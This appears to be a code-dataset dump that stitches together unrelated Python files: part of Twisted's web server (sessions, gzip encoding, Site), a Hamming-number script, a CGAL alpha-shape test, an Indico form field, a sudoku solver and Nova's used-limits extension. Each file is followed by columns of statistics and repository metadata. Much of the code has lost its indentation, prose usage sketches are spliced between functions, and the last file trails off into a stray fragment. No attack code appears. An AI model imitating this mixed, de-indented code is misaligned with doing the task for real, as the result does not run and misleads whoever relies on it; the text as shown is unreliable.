# We MUST include an Allow header
# (RFC 2616, 10.4.6 and 14.7)
self.setHeader(b"Allow", b", ".join(allowedMethods))
s = (
"""Your browser approached me (at %(URI)s) with"""
""" the method "%(method)s". I only allow"""
""" the method%(plural)s %(allowed)s here."""
% {
"URI": escape(nativeString(self.uri)),
"method": nativeString(self.method),
"plural": ((len(allowedMethods) > 1) and "s") or "",
"allowed": ", ".join([nativeString(x) for x in allowedMethods]),
}
)
epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s)
body = epage.render(self)
else:
epage = resource.ErrorPage(
http.NOT_IMPLEMENTED,
"Huh?",
"I don't know how to treat a %s request."
% (escape(self.method.decode("charmap")),),
)
body = epage.render(self)
# end except UnsupportedMethod
if body is NOT_DONE_YET:
return
if not isinstance(body, bytes):
body = resource.ErrorPage(
http.INTERNAL_SERVER_ERROR,
"Request did not return bytes",
"Request: "
+ util._PRE(reflect.safe_repr(self))
+ "<br />"
+ "Resource: "
+ util._PRE(reflect.safe_repr(resrc))
+ "<br />"
+ "Value: "
+ util._PRE(reflect.safe_repr(body)),
).render(self)
if self.method == b"HEAD":
if len(body) > 0:
# This is a Bad Thing (RFC 2616, 9.4)
self._log.info(
"Warning: HEAD request {slf} for resource {resrc} is"
" returning a message body. I think I'll eat it.",
slf=self,
resrc=resrc,
)
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(b"")
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
def processingFailed(self, reason):
"""
Finish this request with an indication that processing failed and
possibly display a traceback.
@param reason: Reason this request has failed.
@type reason: L{twisted.python.failure.Failure}
@return: The reason passed to this method.
@rtype: L{twisted.python.failure.Failure}
"""
self._log.failure("", failure=reason)
if self.site.displayTracebacks:
body = (
b"<html><head><title>web.Server Traceback"
b" (most recent call last)</title></head>"
b"<body><b>web.Server Traceback"
b" (most recent call last):</b>\n\n"
+ util.formatFailure(reason)
+ b"\n\n</body></html>\n"
)
else:
body = (
b"<html><head><title>Processing Failed"
b"</title></head><body>"
b"<b>Processing Failed</b></body></html>"
)
self.setResponseCode(http.INTERNAL_SERVER_ERROR)
self.setHeader(b"content-type", b"text/html")
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
return reason
def view_write(self, issuer, data):
"""Remote version of write; same interface."""
self.write(data)
def view_finish(self, issuer):
"""Remote version of finish; same interface."""
self.finish()
def view_addCookie(self, issuer, k, v, **kwargs):
"""Remote version of addCookie; same interface."""
self.addCookie(k, v, **kwargs)
def view_setHeader(self, issuer, k, v):
"""Remote version of setHeader; same interface."""
self.setHeader(k, v)
def view_setLastModified(self, issuer, when):
"""Remote version of setLastModified; same interface."""
self.setLastModified(when)
def view_setETag(self, issuer, tag):
"""Remote version of setETag; same interface."""
self.setETag(tag)
def view_setResponseCode(self, issuer, code, message=None):
"""
Remote version of setResponseCode; same interface.
"""
self.setResponseCode(code, message)
def view_registerProducer(self, issuer, producer, streaming):
"""Remote version of registerProducer; same interface.
(requires a remote producer.)
"""
self.registerProducer(_RemoteProducerWrapper(producer), streaming)
def view_unregisterProducer(self, issuer):
self.unregisterProducer()
### these calls remain local
_secureSession = None
_insecureSession = None
@property
def session(self):
"""
If a session has already been created or looked up with
L{Request.getSession}, this will return that object. (This will always
be the session that matches the security of the request; so if
C{forceNotSecure} is used on a secure request, this will not return
that session.)
@return: the session attribute
@rtype: L{Session} or L{None}
"""
if self.isSecure():
return self._secureSession
else:
return self._insecureSession
def getSession(self, sessionInterface=None, forceNotSecure=False):
"""
Check if there is a session cookie, and if not, create it.
By default, the cookie will be secure for HTTPS requests and not secure
for HTTP requests. If for some reason you need access to the insecure
cookie from a secure request you can set C{forceNotSecure = True}.
@param forceNotSecure: Should we retrieve a session that will be
transmitted over HTTP, even if this L{Request} was delivered over
HTTPS?
@type forceNotSecure: L{bool}
"""
# Make sure we aren't creating a secure session on a non-secure page
secure = self.isSecure() and not forceNotSecure
if not secure:
cookieString = b"TWISTED_SESSION"
sessionAttribute = "_insecureSession"
else:
cookieString = b"TWISTED_SECURE_SESSION"
sessionAttribute = "_secureSession"
session = getattr(self, sessionAttribute)
if session is not None:
# We have a previously created session.
try:
# Refresh the session, to keep it alive.
session.touch()
except (AlreadyCalled, AlreadyCancelled):
# Session has already expired.
session = None
if session is None:
# No session was created yet for this request.
cookiename = b"_".join([cookieString] + self.sitepath)
sessionCookie = self.getCookie(cookiename)
if sessionCookie:
try:
session = self.site.getSession(sessionCookie)
except KeyError:
pass
# if it still hasn't been set, fix it up.
if not session:
session = self.site.makeSession()
self.addCookie(cookiename, session.uid, path=b"/", secure=secure)
setattr(self, sessionAttribute, session)
if sessionInterface:
return session.getComponent(sessionInterface)
return session
def _prePathURL(self, prepath):
port = self.getHost().port
if self.isSecure():
default = 443
else:
default = 80
if port == default:
hostport = ""
else:
hostport = ":%d" % port
prefix = networkString(
"http%s://%s%s/"
% (
self.isSecure() and "s" or "",
nativeString(self.getRequestHostname()),
hostport,
)
)
path = b"/".join([quote(segment, safe=b"") for segment in prepath])
return prefix + path
def prePathURL(self):
return self._prePathURL(self.prepath)
def URLPath(self):
from twisted.python import urlpath
return urlpath.URLPath.fromRequest(self)
def rememberRootURL(self):
"""
Remember the currently-processed part of the URL for later
recalling.
"""
url = self._prePathURL(self.prepath[:-1])
self.appRootURL = url
def getRootURL(self):
"""
Get a previously-remembered URL.
@return: An absolute URL.
@rtype: L{bytes}
"""
return self.appRootURL
def _handleStar(self):
"""
Handle receiving a request whose path is '*'.
RFC 7231 defines an OPTIONS * request as being something that a client
can send as a low-effort way to probe server capabilities or readiness.
Rather than bother the user with this, we simply fast-path it back to
an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed
telling the client they can only use OPTIONS.
"""
if self.method == b"OPTIONS":
self.setResponseCode(http.OK)
else:
self.setResponseCode(http.NOT_ALLOWED)
self.setHeader(b"Allow", b"OPTIONS")
# RFC 7231 says we MUST set content-length 0 when responding to this
# with no body.
self.setHeader(b"Content-Length", b"0")
self.finish()
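A minimal usage sketch for the session machinery above (not part of this module; the resource and the "visits" attribute are illustrative): a leaf resource that counts requests per session via Request.getSession().

from twisted.web.resource import Resource

class Counter(Resource):
    isLeaf = True

    def render_GET(self, request):
        session = request.getSession()  # creates the session cookie if absent
        # Session is Componentized, so ad-hoc attributes are fine for a sketch.
        session.visits = getattr(session, "visits", 0) + 1
        return b"visit #%d" % (session.visits,)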
@implementer(iweb._IRequestEncoderFactory)
class GzipEncoderFactory:
"""
@cvar compressLevel: The compression level used by the compressor, default
to 9 (highest).
@since: 12.3
"""
_gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])")
compressLevel = 9
def encoderForRequest(self, request):
"""
Check the request headers to see whether the client accepts gzip
encoding, and if so, encode the response.
"""
acceptHeaders = b",".join(
request.requestHeaders.getRawHeaders(b"accept-encoding", [])
)
if self._gzipCheckRegex.search(acceptHeaders):
encoding = request.responseHeaders.getRawHeaders(b"content-encoding")
if encoding:
encoding = b",".join(encoding + [b"gzip"])
else:
encoding = b"gzip"
request.responseHeaders.setRawHeaders(b"content-encoding", [encoding])
return _GzipEncoder(self.compressLevel, request)
@implementer(iweb._IRequestEncoder)
class _GzipEncoder:
"""
An encoder which supports gzip.
@ivar _zlibCompressor: The zlib compressor instance used to compress the
stream.
@ivar _request: A reference to the originating request.
@since: 12.3
"""
_zlibCompressor = None
def __init__(self, compressLevel, request):
self._zlibCompressor = zlib.compressobj(
compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS
)
self._request = request
def encode(self, data):
"""
Write to the request, automatically compressing data on the fly.
"""
if not self._request.startedWriting:
# Remove the content-length header, we can't honor it
# because we compress on the fly.
self._request.responseHeaders.removeHeader(b"content-length")
return self._zlibCompressor.compress(data)
def finish(self):
"""
Finish handling the request, flushing any remaining data from the zlib
buffer.
"""
remain = self._zlibCompressor.flush()
self._zlibCompressor = None
return remain
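To actually negotiate gzip for a resource tree, the factory above is normally paired with a wrapper resource. A hedged sketch, assuming EncodingResourceWrapper is available from twisted.web.resource:

from twisted.web.resource import EncodingResourceWrapper, Resource
from twisted.web.server import GzipEncoderFactory, Site

root = Resource()
# Responses for the wrapped tree are gzip-encoded when the client accepts it.
site = Site(EncodingResourceWrapper(root, [GzipEncoderFactory()]))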
class _RemoteProducerWrapper:
def __init__(self, remote):
self.resumeProducing = remote.remoteMethod("resumeProducing")
self.pauseProducing = remote.remoteMethod("pauseProducing")
self.stopProducing = remote.remoteMethod("stopProducing")
class Session(components.Componentized):
"""
A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
@ivar site: The L{Site} that generated the session.
@type site: L{Site}
@ivar uid: A unique identifier for the session.
@type uid: L{bytes}
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar sessionTimeout: Time after last modification the session will expire,
in seconds.
@type sessionTimeout: L{float}
@ivar lastModified: Time the C{touch()} method was last called (or time the
session was created). A UNIX timestamp as returned by
L{IReactorTime.seconds()}.
@type lastModified: L{float}
"""
sessionTimeout = 900
_expireCall = None
def __init__(self, site, uid, reactor=None):
"""
Initialize a session with a unique ID for that session.
@param reactor: L{IReactorTime} used to schedule expiration of the
session. If C{None}, the reactor associated with I{site} is used.
"""
super().__init__()
if reactor is None:
reactor = site.reactor
self._reactor = reactor
self.site = site
self.uid = uid
self.expireCallbacks = []
self.touch()
self.sessionNamespaces = {}
def startCheckingExpiration(self):
"""
Start expiration tracking.
@return: L{None}
"""
self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)
def notifyOnExpire(self, callback):
"""
Call this callback when the session expires or logs out.
"""
self.expireCallbacks.append(callback)
def expire(self):
"""
Expire/logout of the session.
"""
del self.site.sessions[self.uid]
for c in self.expireCallbacks:
c()
self.expireCallbacks = []
if self._expireCall and self._expireCall.active():
self._expireCall.cancel()
# Break reference cycle.
self._expireCall = None
def touch(self):
"""
Mark the session as modified, which resets the expiration timer.
"""
self.lastModified = self._reactor.seconds()
if self._expireCall is not None:
self._expireCall.reset(self.sessionTimeout)
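sessionTimeout is a class attribute, so the idle timeout can be tuned by swapping the session factory on a site. A small sketch (names illustrative; `site` is assumed to be a Site instance):

from twisted.web.server import Session

class ShortSession(Session):
    sessionTimeout = 60  # expire after one minute of inactivity

# site.sessionFactory = ShortSession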
version = networkString(f"TwistedWeb/{copyright.version}")
@implementer(interfaces.IProtocolNegotiationFactory)
class Site(http.HTTPFactory):
"""
A web site: manages logs, sessions, and resources.
@ivar requestFactory: A factory which is called with (channel)
and creates L{Request} instances. Defaults to L{Request}.
@ivar displayTracebacks: If set, unhandled exceptions raised during
rendering are returned to the client as HTML. Defaults to C{False}.
@ivar sessionFactory: Factory for session objects. Defaults to L{Session}.
@ivar sessions: Mapping of session IDs to objects returned by
C{sessionFactory}.
@type sessions: L{dict} mapping L{bytes} to L{Session} given the default
C{sessionFactory}
@ivar counter: The number of sessions that have been generated.
@type counter: L{int}
@ivar sessionCheckTime: Deprecated and unused. See
L{Session.sessionTimeout} instead.
"""
counter = 0
requestFactory = Request
displayTracebacks = False
sessionFactory = Session
sessionCheckTime = 1800
_entropy = os.urandom
def __init__(self, resource, requestFactory=None, *args, **kwargs):
"""
@param resource: The root of the resource hierarchy. All request
traversal for requests received by this factory will begin at this
resource.
@type resource: L{IResource} provider
@param requestFactory: Override for the default C{requestFactory}.
@type requestFactory: C{callable} or C{class}.
@see: L{twisted.web.http.HTTPFactory.__init__}
"""
super().__init__(*args, **kwargs)
self.sessions = {}
self.resource = resource
if requestFactory is not None:
self.requestFactory = requestFactory
def _openLogFile(self, path):
from twisted.python import logfile
return logfile.LogFile(os.path.basename(path), os.path.dirname(path))
def __getstate__(self):
d = self.__dict__.copy()
d["sessions"] = {}
return d
def _mkuid(self):
"""
(internal) Generate an opaque, unique ID for a user's session.
"""
self.counter = self.counter + 1
return hexlify(self._entropy(32))
def makeSession(self):
"""
Generate a new Session instance, and store it for future reference.
"""
uid = self._mkuid()
session = self.sessions[uid] = self.sessionFactory(self, uid)
session.startCheckingExpiration()
return session
def getSession(self, uid):
"""
Get a previously generated session.
@param uid: Unique ID of the session.
@type uid: L{bytes}.
@raise KeyError: If the session is not found.
"""
return self.sessions[uid]
def buildProtocol(self, addr):
"""
Generate a channel attached to this site.
"""
channel = super().buildProtocol(addr)
channel.requestFactory = self.requestFactory
channel.site = self
return channel
isLeaf = 0
def render(self, request):
"""
Redirect because a Site is always a directory.
"""
request.redirect(request.prePathURL() + b"/")
request.finish()
def getChildWithDefault(self, pathEl, request):
"""
Emulate a resource's getChild method.
"""
request.site = self
return self.resource.getChildWithDefault(pathEl, request)
def getResourceFor(self, request):
"""
Get a resource for a request.
This iterates through the resource hierarchy, calling
getChildWithDefault on each resource it finds for a path element,
stopping when it hits an element where isLeaf is true.
"""
request.site = self
# Sitepath is used to determine cookie names between distributed
# servers and disconnected sites.
request.sitepath = copy.copy(request.prepath)
return resource.getChildForRequest(self.resource, request)
# IProtocolNegotiationFactory
def acceptableProtocols(self):
"""
Protocols this server can speak.
"""
baseProtocols = [b"http/1.1"]
if http.H2_ENABLED:
baseProtocols.insert(0, b"h2")
return baseProtocols
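A minimal end-to-end sketch tying Site and a resource together with the reactor; this is standard Twisted wiring, shown here for orientation:

from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site

class Hello(Resource):
    isLeaf = True

    def render_GET(self, request):
        return b"hello"

reactor.listenTCP(8080, Site(Hello()))
reactor.run()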
| 32.601545
| 88
| 0.593561
| 3,276
| 29,537
| 5.295788
| 0.213065
| 0.008877
| 0.00807
| 0.007263
| 0.090783
| 0.055969
| 0.040636
| 0.03372
| 0.029454
| 0.02565
| 0
| 0.004778
| 0.312693
| 29,537
| 905
| 89
| 32.637569
| 0.84981
| 0.317026
| 0
| 0.161572
| 0
| 0
| 0.081838
| 0.013387
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10917
| false
| 0.002183
| 0.052402
| 0.004367
| 0.303493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865af347d7d59f9bd67eb9dbfa07a221fbd308e5
| 554
|
py
|
Python
|
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | 9
|
2020-06-05T17:01:23.000Z
|
2022-03-16T19:55:50.000Z
|
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | null | null | null |
Pset/hamming_numbers.py
|
MarkHershey/python-learning
|
8d6c87941af6db5878b59483526ed402f4b319b3
|
[
"MIT"
] | null | null | null |
def hamming(n):
"""Returns the nth hamming number"""
hamming = {1}
x = 1
while len(hamming) <= n * 3.5:
new_hamming = {1}
for i in hamming:
new_hamming.add(i * 2)
new_hamming.add(i * 3)
new_hamming.add(i * 5)
# merge new number into hamming set
hamming = hamming.union(new_hamming)
hamming = sorted(list(hamming))
return hamming[n - 1]
print(hamming(970))
# hamming(968) should be 41943040
# hamming(969) should be 41990400
# hamming(970) should be 42187500
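The growth factor of 3.5 above is a heuristic, not a proven bound. A heap-based generator avoids it entirely by always extracting the smallest candidate next; this sketch reproduces the expected values listed in the comments:

import heapq

def hamming_heap(n):
    """Return the nth Hamming number by lazy smallest-first expansion."""
    heap, seen = [1], {1}
    for _ in range(n - 1):
        smallest = heapq.heappop(heap)
        for factor in (2, 3, 5):
            candidate = smallest * factor
            if candidate not in seen:
                seen.add(candidate)
                heapq.heappush(heap, candidate)
    return heap[0]

assert hamming_heap(968) == 41943040
assert hamming_heap(969) == 41990400
assert hamming_heap(970) == 42187500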
| 24.086957
| 44
| 0.592058
| 77
| 554
| 4.194805
| 0.454545
| 0.154799
| 0.120743
| 0.130031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 0.296029
| 554
| 22
| 45
| 25.181818
| 0.712821
| 0.290614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.153846
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865bbf72a785e72699020e27186c8a54194bf255
| 1,615
|
py
|
Python
|
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
examples/python/test_as2.py
|
sloriot/cgal-swig-bindings
|
c9c5afdf64fa0c52f9c3785173159167ab2b3163
|
[
"BSL-1.0"
] | null | null | null |
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3
lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))
t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)
t.clear()
t.make_alpha_shape(lst)
for d in t.alpha():
print(d)
for v in t.finite_vertices():
    vertex_type = t.classify(v)  # renamed from 'type' to avoid shadowing the built-in
    print(v.get_range()[0])
    if vertex_type == INTERIOR:
        print("INTERIOR")
    elif vertex_type == SINGULAR:
        print("SINGULAR")
    elif vertex_type == REGULAR:
        print("REGULAR")
    elif vertex_type == EXTERIOR:
        print("EXTERIOR")
for f in t.finite_faces():
i = f.get_ranges(0)
print(i.first)
print(i.second)
print(i.third)
was = Weighted_alpha_shape_2()
lst_wp = []
lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))
was.make_alpha_shape(lst_wp)
| 26.47541
| 82
| 0.740557
| 293
| 1,615
| 3.764505
| 0.187713
| 0.108794
| 0.149592
| 0.107888
| 0.595648
| 0.453309
| 0.453309
| 0.453309
| 0.446963
| 0.359021
| 0
| 0.059626
| 0.138081
| 1,615
| 60
| 83
| 26.916667
| 0.732759
| 0
| 0
| 0
| 0
| 0
| 0.019195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.191489
| 0
| 0.191489
| 0.191489
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
865fa048751d6ad0bc743581cad5200b3338324d
| 2,192
|
py
|
Python
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 1
|
2018-11-12T21:29:26.000Z
|
2018-11-12T21:29:26.000Z
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 9
|
2020-09-08T09:25:57.000Z
|
2022-01-13T02:59:05.000Z
|
indico/web/forms/fields/protection.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 3
|
2020-07-20T09:09:44.000Z
|
2020-10-19T00:29:49.000Z
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import absolute_import, unicode_literals
from flask import render_template
from markupsafe import Markup
from indico.core.db import db
from indico.core.db.sqlalchemy.protection import ProtectionMode
from indico.util.i18n import _
from indico.web.forms.fields import IndicoEnumRadioField
from indico.web.forms.widgets import JinjaWidget
class IndicoProtectionField(IndicoEnumRadioField):
widget = JinjaWidget('forms/protection_widget.html', single_kwargs=True)
radio_widget = JinjaWidget('forms/radio_buttons_widget.html', orientation='horizontal', single_kwargs=True)
def __init__(self, *args, **kwargs):
self.protected_object = kwargs.pop('protected_object')(kwargs['_form'])
get_acl_message_url = kwargs.pop('acl_message_url', None)
self.acl_message_url = get_acl_message_url(kwargs['_form']) if get_acl_message_url else None
self.can_inherit_protection = self.protected_object.protection_parent is not None
if not self.can_inherit_protection:
kwargs['skip'] = {ProtectionMode.inheriting}
super(IndicoProtectionField, self).__init__(*args, enum=ProtectionMode, **kwargs)
def render_protection_message(self):
protected_object = self.get_form().protected_object
if hasattr(protected_object, 'get_non_inheriting_objects'):
non_inheriting_objects = protected_object.get_non_inheriting_objects()
else:
non_inheriting_objects = []
if isinstance(protected_object.protection_parent, db.m.Event):
parent_type = _('Event')
elif isinstance(protected_object.protection_parent, db.m.Category):
parent_type = _('Category')
else:
parent_type = _('Session')
rv = render_template('_protection_info.html', field=self, protected_object=protected_object,
parent_type=parent_type, non_inheriting_objects=non_inheriting_objects)
return Markup(rv)
| 45.666667
| 111
| 0.734945
| 268
| 2,192
| 5.701493
| 0.373134
| 0.107984
| 0.078534
| 0.031414
| 0.175393
| 0.146597
| 0.057592
| 0
| 0
| 0
| 0
| 0.005571
| 0.181113
| 2,192
| 47
| 112
| 46.638298
| 0.845682
| 0.091241
| 0
| 0.058824
| 0
| 0
| 0.091184
| 0.053401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866094a72b6fdcd5bf322c232acd28e290c2c5aa
| 3,096
|
py
|
Python
|
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | 1
|
2020-08-04T05:11:05.000Z
|
2020-08-04T05:11:05.000Z
|
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | null | null | null |
solver.py
|
jacobchh/Sudoku-Solver
|
946a954e8eda234760872c55fcd2354dc0a8a4f9
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
board = np.zeros(shape=(9, 9))
count = 0
def solve():
global count
count += 1
if count % 1000 == 0:
print('\rCurrent number of computations made:', count, end='')
freePos = find()
if freePos is None:
return True
i = freePos[0]
j = freePos[1]
for w in range(1, 10):
if possible(w, freePos):
board[i][j] = w
if solve():
return True
board[i][j] = 0
return False
def find():
for i in range(9):
for j in range(9):
if board[i][j] == 0:
return [i, j]
return None
def possible(value, position):
# position = (i, j) tuple
i = position[0]
j = position[1]
# checks row and column for repeat value
if (value in board[:, j]) or (value in board[i]):
return False
# move i, j to the top-left corner of the containing 3x3 box
i = (i // 3) * 3
j = (j // 3) * 3
# check every cell in that 3x3 box
for n in range(i, i + 3):
for m in range(j, j + 3):
if board[n][m] == value:
return False
return True
def change(position):
# position = (i, j) tuple
i = position[0]
j = position[1]
for w in range(1, 10):
if w not in board[:, j] and w not in board[i]:
board[i][j] = w
return True
return False
def initialize():
print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank")
integerChunk = input("Numbers: ")
pos = 0
for i in range(9):
for j in range(9):
board[i][j] = int(integerChunk[pos])
pos += 1
def displayBoard():
    # The original repeated this loop three times (rows 0-2, 3-5, 6-8);
    # the copies differed only in the row range, so they are folded into one.
    for i in range(9):
        for j in range(9):
            if board[i][j] == 0:
                print("  ", end="")  # two spaces assumed, matching the width of "%d "
            else:
                print("%d " % board[i][j], end="")
            if (j == 2) or (j == 5):
                print("| ", end="")
            if j == 8:
                print("")
        if (i == 2) or (i == 5):
            print("- - - - - - - - - - -")
def main():
initialize()
print("Is this the correct board? Press enter to continue or 'q' to exit program.")
displayBoard()
response = input()
if response == "q":
exit()
print("---------------SOLVING---------------\n")
solve()
print("\r\rSOLUTION")
displayBoard()
print("\nTotal number of computations:", count)
if __name__ == "__main__":
main()
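For a non-interactive run, the input() call in initialize() can be bypassed by loading a hardcoded 81-digit puzzle (0 = blank) straight into the module-level board. A sketch, assuming it executes in the same namespace as board, solve, and displayBoard above; the grid is a well-known solvable puzzle:

puzzle = ("530070000600195000098000060"
          "800060003400803001700020006"
          "060000280000419005000080079")
for pos, ch in enumerate(puzzle):
    board[pos // 9][pos % 9] = int(ch)
solve()
displayBoard()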
| 23.633588
| 105
| 0.440891
| 406
| 3,096
| 3.342365
| 0.238916
| 0.022108
| 0.056743
| 0.029477
| 0.344878
| 0.32056
| 0.32056
| 0.32056
| 0.296242
| 0.296242
| 0
| 0.029963
| 0.396318
| 3,096
| 130
| 106
| 23.815385
| 0.696094
| 0.046835
| 0
| 0.514851
| 0
| 0
| 0.12466
| 0.013247
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069307
| false
| 0
| 0.009901
| 0
| 0.178218
| 0.19802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8660a9342ead6210c470087662e4e506c3d6349b
| 2,863
|
py
|
Python
|
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | null | null | null |
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | null | null | null |
nova/api/openstack/compute/used_limits.py
|
bopopescu/nova-8
|
768d7cc0a632e1a880f00c5840c1ec8051e161be
|
[
"Apache-2.0"
] | 1
|
2020-07-22T21:09:15.000Z
|
2020-07-22T21:09:15.000Z
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova.api.openstack.api_version_request \
import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import used_limits as ul_policies
from nova import quota
QUOTAS = quota.QUOTAS
class UsedLimitsController(wsgi.Controller):
@staticmethod
def _reserved(req):
try:
return int(req.GET['reserved'])
except (ValueError, KeyError):
return False
@wsgi.extends
@extensions.expected_errors(())
def index(self, req, resp_obj):
context = req.environ['nova.context']
project_id = self._project_id(context, req)
quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)
if api_version_request.is_supported(
req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalServerGroupsUsed': 'server_groups',
}
else:
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalFloatingIpsUsed': 'floating_ips',
'totalSecurityGroupsUsed': 'security_groups',
'totalServerGroupsUsed': 'server_groups',
}
used_limits = {}
for display_name, key in quota_map.items():
if key in quotas:
reserved = (quotas[key]['reserved']
if self._reserved(req) else 0)
used_limits[display_name] = quotas[key]['in_use'] + reserved
resp_obj.obj['limits']['absolute'].update(used_limits)
def _project_id(self, context, req):
if 'tenant_id' in req.GET:
tenant_id = req.GET.get('tenant_id')
target = {
'project_id': tenant_id,
'user_id': context.user_id
}
context.can(ul_policies.BASE_POLICY_NAME, target)
return tenant_id
return context.project_id
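The core of index() is a dictionary fold from display names onto quota usage. Stripped of the API plumbing, the logic reduces to this runnable fragment (the sample numbers are invented):

quotas = {"ram": {"in_use": 2048, "reserved": 512},
          "cores": {"in_use": 4, "reserved": 0}}
quota_map = {"totalRAMUsed": "ram", "totalCoresUsed": "cores"}
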